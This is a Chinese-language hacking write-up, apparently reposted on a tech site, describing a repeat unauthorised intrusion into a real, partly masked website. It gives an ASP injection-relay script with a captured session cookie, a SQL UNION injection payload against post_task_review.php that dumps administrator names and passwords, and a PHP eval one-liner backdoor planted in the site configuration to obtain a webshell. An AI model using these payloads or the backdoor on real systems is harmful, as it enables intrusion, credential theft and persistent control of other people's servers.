在线时间:8:00-16:00
迪恩网络APP
随时随地掌握行业动态
扫描二维码
关注迪恩网络微信公众号
在这次入侵之前我已经拿到过一次这个网站的shell了,但是被删除了,由于不甘心又拿了一次,才有了下面的过程
一: 踩点 收集信息 因为这个已经是第二次入侵,所以具体的信息我已经基本上掌握 服务器上13个站点,大多数站点很安全,因为第一渗透的时候,是由 http://www.shanXXX.XX 这个站进入的 我这个人比较恋旧,所以第二次也决定由这个站点进行入侵, 由后台看出这个站的程序是RAICO_V1[1].2_CS 如图1 500)this.width=500" title="点击这里用新窗口浏览图片" /> 直接从网上down下来,读代码,当然这里的php代码 本人是非常的菜鸟,感谢我的好友jackal,他的脚本是相当的强悍,呵呵 二: 漏洞在哪里?它在灯火阑珊处 这个程序的漏洞文件是在post_task_review.php 由于过滤不严格导致注入,下面我会在文章中详细说明如何利用, 首先在shan这个站注册个用户 并抓取登陆的cookie值,在到本地或者webshell上建立一个注入中转站的文件 内容如下 http://www.shanXXX.XX/post_task_review.php" JmRef="http://www.shanXXX.XX/post_task.php" JmCok="__utma=213560918.3117244849183171600.1213283730.1213293786.1213305387.4; __utmz=213560918.1213283730.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=213560918.21.10.1213305387; __utmc=213560918; PHPSESSID=96b20d4edfe8477cf276aa639bfc31d3" JmStr=URLEncoding(JmStr) response.write PostData(JMUrl,JmStr,JmCok,JmRef) Function PostData(PostUrl,PostStr,PostCok,PostRef) Dim Http Set Http = Server.CreateObject("msxml2.serverXMLHTTP") With Http .Open "POST",PostUrl,False .SetRequestHeader "Content-Length",Len(PostStr) .SetRequestHeader "Content-Type","application/x-www-form-urlencoded" .SetRequestHeader "Referer",PostRef .SetRequestHeader "Cookie",PostCok .Send PostStr PostData = .ResponseBody End With Set Http = Nothing PostData =bytes2BSTR(PostData) End Function Function bytes2BSTR(vIn) Dim strReturn Dim I, ThisCharCode, NextCharCode strReturn = "" For I = 1 To LenB(vIn) ThisCharCode = AscB(MidB(vIn, I, 1)) If ThisCharCode 之后浏览地址为http://localhost/jmpost.asp?id=1107 and 1=2 union select -1,concat(admin_name,admin_pw) from rco_admin/* 就可以直接爆出管理员的用户名和密码 如图2 500)this.width=500" title="点击这里用新窗口浏览图片" /> 三: 获取webshell 拿到目标站的路径. 登陆后台 ,只能上传图片,抓包上传,截断 ,未能实现. 但是后台的配置那可以插一句话 a'";@eval($_POST[cmd]);// 写进去本来是site="a\'\";@eval" 但是过滤了' 就成了site="a\\";@eval;//" 这样成功的闭合了前面的双引,把后面的双引注释掉了.中间的;@eval($_POST[cmd]);就可以执行了. 把a'";@eval($_POST[cmd]);// 写进去就保存到一个文件里了. 这个文件被所有的文件包含. 所以我们直接同一句话连接端连接网站的任何一个文件都可以获得webshell. 如图 500)this.width=500" title="点击这里用新窗口浏览图片" /> 500)this.width=500" title="点击这里用新窗口浏览图片" /> 直接传php没传上去,所以把php马改成jpg格式的,之后在一句话连接端中修改成php的 顺利拿到webshell如图, 500)this.width=500" title="点击这里用新窗口浏览图片" /> |
2022-08-15
2022-08-17
2022-09-23
2023-10-27
2022-08-18
请发表评论